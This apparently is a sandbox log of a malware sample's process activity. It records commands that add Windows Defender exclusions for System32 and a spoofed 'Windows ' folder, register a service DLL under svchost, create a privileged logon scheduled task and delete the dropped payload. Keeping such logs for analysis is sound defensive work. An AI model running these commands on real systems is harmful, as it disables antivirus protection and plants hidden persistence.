powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
2180powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
2780cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
2968powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
3040cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
2112cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
2632powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
2740cmd.exe cmd.exe /c sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x748413\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x748413.dat" /f && sc start x748413
2088schtasks.exe schtasks /delete /tn "console_zero" /f
1480cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
2116schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
2972timeout.exe timeout /t 10 /nobreak
948timeout.exe timeout /t 10 /nobreak
2272cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\test22\AppData\Local\Temp\pyld611114.exe"
2612timeout.exe timeout /t 10 /nobreak
2676